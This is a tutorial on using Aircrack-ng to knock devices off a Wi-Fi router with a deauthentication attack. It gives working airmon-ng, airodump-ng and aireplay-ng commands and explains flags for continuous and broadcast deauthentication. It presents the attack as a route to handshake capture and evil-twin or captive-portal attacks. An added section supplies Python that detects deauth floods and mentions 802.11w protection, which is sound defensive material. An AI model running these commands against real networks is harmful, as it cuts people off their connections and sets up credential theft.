Use Aircrack-ng to DOS a Router

What is it

A Wi-Fi deauthentication attack is a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point.

Unlike most radio jammers, deauthentication acts in a unique way. The IEEE 802.11 (Wi-Fi) protocol contains the provision for a deauthentication frame. Sending the frame from the access point to a station is called a “sanctioned technique to inform a rogue station that they have been disconnected from the network”.[1]

An attacker can send a deauthentication frame at any time to a wireless access point, with a spoofed address for the victim. The protocol does not require any encryption for this frame, even when the session was established with Wired Equivalent Privacy (WEP) for data privacy, and the attacker only needs to know the victim’s MAC address, which is available in the clear through wireless network sniffing.

Source: Wi-Fi deauthentication attack, Wikipedia.

Why Use it

  • Capture WPA/WPA2 4-Way Handshakes by forcing users to reconnect to the network
  • Force users to connect to some bad access point (Evil Twin Attack)
  • Force users to connect to a Captive Portal

Terminology

  • Monitor Mode: lets your NIC capture data sent or received by nearby wireless devices over the air.

  • Packet Injection: lets you inject or send frames to nearby wireless devices and networks.

Preparation

  • Kali Linux, or Ubuntu with Katoolin. Aireplay-ng (part of the Aircrack-ng suite) is needed to complete the task.
  • A NIC (Network Interface Controller) that supports monitor mode, for example the EDIMAX EW-7711UAN or TP-LINK TL-WN722N 150.
  • Target router.

Steps

Run ifconfig to see the network interface configuration.

Run iwconfig to see the wireless interface configuration.

You can change the current channel with sudo iwconfig wlan0 channel x, where x is the target channel.

airmon-ng start wlan0 (wlan0, or whatever your adapter is called) puts the adapter into monitor mode. To leave monitor mode, replace ‘start’ with ‘stop’.

Then run iwconfig again: the Mode shown for the interface will now be ‘Monitor’ (recent airmon-ng versions also rename the interface to wlan0mon, which is the name used below).

airodump-ng wlan0mon scans the air around you and returns a list of access points with these columns:

  • BSSID: MAC address of the access point.
  • PWR: Signal level reported by the card.
  • Beacons: Number of announcement packets sent by the AP. Each AP sends about 10 beacons per second at the lowest rate (1M).
  • #Data: Number of captured data packets, including data broadcast packets.
  • #/s: Number of data packets per second, measured over the last 10 seconds.
  • CH: Channel number.
  • MB: Maximum speed supported by the AP.
  • ENC: Encryption algorithm in use.
  • CIPHER: The cipher detected.
  • AUTH: The authentication protocol used.
  • ESSID: The wireless network name.

While airodump-ng is running you can press keys to adjust what is shown on screen (see also the Chinese documentation):

  • a: change which content is shown.
  • s: change the sorting column.
  • i: invert the sort order.
  • d: restore the default sorting (by PWR).
  • r: start/stop real-time sorting.
  • m: change highlight color.
  • space: start/stop refreshing.

airodump-ng -d Target_BSSID -c Target_Channel wlan0mon restricts the capture to the target AP on its channel.

The MAC addresses of the devices connected to the target AP will then be shown.

aireplay-ng -0 0 -a Target_BSSID -c Target_Mac wlan0mon starts deauthenticating the chosen device.

  • -0: deauthentication attack mode.
  • 0: the number of deauth frames to send. 0 means send them continuously; send 10 instead if you only want the target to disconnect and reconnect.
  • -a: MAC address of the AP.
  • -c: MAC address of the client device. Omitting ‘-c Target_Mac’ deauthenticates all devices on the AP (the frames are then sent to the broadcast address).
  • wlan0mon: name of the monitor-mode interface.

The airodump-ng scan lists the routers around you: write down the victim’s BSSID (MAC address) and CH (channel). ESSID is the router’s name.
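As an added example (not from the original article), here is detection logic a defender could run over captured 802.11 management frames to spot the flood that the aireplay-ng -0 command above produces: the sender address of a deauth frame is unauthenticated, so the detector keys on the rate per claimed sender/BSSID rather than on the address. The frames it runs on are constructed test fixtures, not captured traffic.

```python
import struct
from collections import defaultdict
# 802.11 frame control, first byte: bits 2-3 = frame type, bits 4-7 = subtype.
MGMT, DISASSOC, DEAUTH = 0, 10, 12
REASONS = {1: "unspecified", 2: "previous auth no longer valid",
           3: "STA is leaving", 7: "class 3 frame from nonassociated STA"}

def mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_frame(raw):
    """Decode the 24-byte 802.11 MAC header, plus the reason code of deauth/disassoc frames."""
    if len(raw) < 24:
        return None
    fc = raw[0]
    hdr = {"type": (fc >> 2) & 0x3, "subtype": fc >> 4, "addr1": mac(raw[4:10]),
           "addr2": mac(raw[10:16]), "addr3": mac(raw[16:22])}
    if hdr["type"] == MGMT and hdr["subtype"] in (DEAUTH, DISASSOC) and len(raw) >= 26:
        hdr["reason"] = struct.unpack("<H", raw[24:26])[0]  # 2-byte little-endian body
    return hdr

def detect_deauth_flood(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp_s, raw_bytes). Alert on each (sender addr2, BSSID addr3)
    sending more than `threshold` deauth/disassoc frames within any `window` seconds."""
    recent, alerts = defaultdict(list), {}
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        h = parse_frame(raw)
        if not h or "reason" not in h:
            continue
        times = recent[(h["addr2"], h["addr3"])]
        times.append(ts)
        while ts - times[0] > window:  # drop frames that fell out of the sliding window
            times.pop(0)
        if len(times) > threshold:
            a = alerts.setdefault((h["addr2"], h["addr3"]),
                                  {"peak_per_window": 0, "reasons": set(), "victims": set()})
            a["peak_per_window"] = max(a["peak_per_window"], len(times))
            a["reasons"].add(REASONS.get(h["reason"], f"code {h['reason']}"))
            a["victims"].add(h["addr1"])  # ff:ff:ff:ff:ff:ff here means '-c' was omitted
    return alerts

def _sample_frame(subtype, dst, src, bssid, reason):
    """Constructed test fixture, not captured traffic: FC, duration, 3 addresses, seq, reason."""
    return (bytes([(subtype << 4) | (MGMT << 2), 0]) + b"\x00\x00" + dst + src + bssid
            + b"\x00\x00" + struct.pack("<H", reason))

AP, STA = bytes.fromhex("021122334455"), bytes.fromhex("02aabbccddee")
# Constructed capture: one benign deauth at t=0, then 20 frames in half a second from t=10.
SAMPLE = [(0.0, _sample_frame(DEAUTH, STA, AP, AP, 3))]
SAMPLE += [(10.0 + i * 0.025, _sample_frame(DEAUTH, STA, AP, AP, 7)) for i in range(20)]
```

A victim address of ff:ff:ff:ff:ff:ff in an alert corresponds to the broadcast case of running aireplay-ng without -c. Enabling 802.11w Protected Management Frames on the access point makes clients discard unauthenticated deauthentication frames, which removes the attack rather than only detecting it.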